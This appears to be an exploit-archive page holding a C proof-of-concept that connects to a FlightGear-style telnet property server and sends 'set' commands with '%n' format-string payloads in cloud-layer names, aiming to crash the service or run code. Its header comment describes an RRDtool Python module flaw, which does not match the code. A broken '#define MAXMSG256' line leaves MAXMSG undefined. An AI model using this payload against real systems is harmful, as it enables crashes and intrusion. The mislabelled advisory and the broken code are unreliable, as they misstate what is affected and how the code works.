扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 |
/* source: https://www.securityfocus.com/bid/60004/info The RRDtool module for Python is prone to a format-string vulnerability because it fails to properly sanitize user-supplied input. An attacker may exploit this issue to execute arbitrary code within the context of the affected application or to crash the application. RRDtool 1.4.7 is affected; other versions may also be vulnerable. */ #include <stdio.h> #include <errno.h> #include <stdlib.h> #include <unistd.h> #include <sys/time.h> #include <sys/types.h> #include <sys/socket.h> #include <netdb.h> #include <netinet/in.h> #include <stdarg.h> #include <string.h> #define DFLTHOST "www.example.com" #define DFLTPORT 5501 #define MAXMSG256 #define fgfsclose close void init_sockaddr(struct sockaddr_in *name, const char *hostname, unsigned port); int fgfswrite(int sock, char *msg, ...); const char *fgfsread(int sock, int wait); void fgfsflush(int sock); int fgfswrite(int sock, char *msg, ...) { va_list va; ssize_t len; char buf[MAXMSG]; va_start(va, msg); vsnprintf(buf, MAXMSG - 2, msg, va); va_end(va); printf("SEND: \t<%s>\n", buf); strcat(buf, "\015\012"); len = write(sock, buf, strlen(buf)); if (len < 0) { perror("fgfswrite"); exit(EXIT_FAILURE); } return len; } const char *fgfsread(int sock, int timeout) { static char buf[MAXMSG]; char *p; fd_set ready; struct timeval tv; ssize_t len; FD_ZERO(&ready); FD_SET(sock, &ready); tv.tv_sec = timeout; tv.tv_usec = 0; if (!select(32, &ready, 0, 0, &tv)) return NULL; len = read(sock, buf, MAXMSG - 1); if (len < 0) { perror("fgfsread"); exit(EXIT_FAILURE); } if (len == 0) return NULL; for (p = &buf[len - 1]; p >= buf; p--) if (*p != '\015' && *p != '\012') break; *++p = '\0'; return strlen(buf) ? buf : NULL; } void fgfsflush(int sock) { const char *p; while ((p = fgfsread(sock, 0)) != NULL) { printf("IGNORE: \t<%s>\n", p); } } int fgfsconnect(const char *hostname, const int port) { struct sockaddr_in serv_addr; struct hostent *hostinfo; int sock; sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP); if (sock < 0) { perror("fgfsconnect/socket"); return -1; } hostinfo = gethostbyname(hostname); if (hostinfo == NULL) { fprintf(stderr, "fgfsconnect: unknown host: \"%s\"\n", hostname); close(sock); return -2; } serv_addr.sin_family = AF_INET; serv_addr.sin_port = htons(port); serv_addr.sin_addr = *(struct in_addr *)hostinfo->h_addr; if (connect(sock, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) < 0) { perror("fgfsconnect/connect"); close(sock); return -3; } return sock; } int main(int argc, char **argv) { int sock; unsigned port; const char *hostname, *p; int i; hostname = argc > 1 ? argv[1] : DFLTHOST; port = argc > 2 ? atoi(argv[2]) : DFLTPORT; sock = fgfsconnect(hostname, port); if (sock < 0) return EXIT_FAILURE; fgfswrite(sock, "data"); fgfswrite(sock, "set /sim/rendering/clouds3d-enable true"); fgfswrite(sock, "set /environment/clouds"); for (i=0; i < 5; i++) { fgfswrite(sock, "set /environment/cloudlayers/layers[%d]/cu/cloud/name %%n", i); fgfswrite(sock, "set /environment/cloudlayers/layers[%d]/cb/cloud/name %%n", i); fgfswrite(sock, "set /environment/cloudlayers/layers[%d]/ac/cloud/name %%n", i); fgfswrite(sock, "set /environment/cloudlayers/layers[%d]/st/cloud/name %%n", i); fgfswrite(sock, "set /environment/cloudlayers/layers[%d]/ns/cloud/name %%n", i); } p = fgfsread(sock, 3); if (p != NULL) printf("READ: \t<%s>\n", p); for (i=0; i < 5; i++) { fgfswrite(sock, "set /environment/clouds/layer[%d]/coverage scattered", i); fgfswrite(sock, "set /environment/clouds/layer[%d]/coverage cirrus", i); fgfswrite(sock, "set /environment/clouds/layer[%d]/coverage clear", i); } p = fgfsread(sock, 3); if (p != NULL) printf("READ: \t<%s>\n", p); fgfswrite(sock, "quit"); fgfsclose(sock); return EXIT_SUCCESS; } |
体验盒子
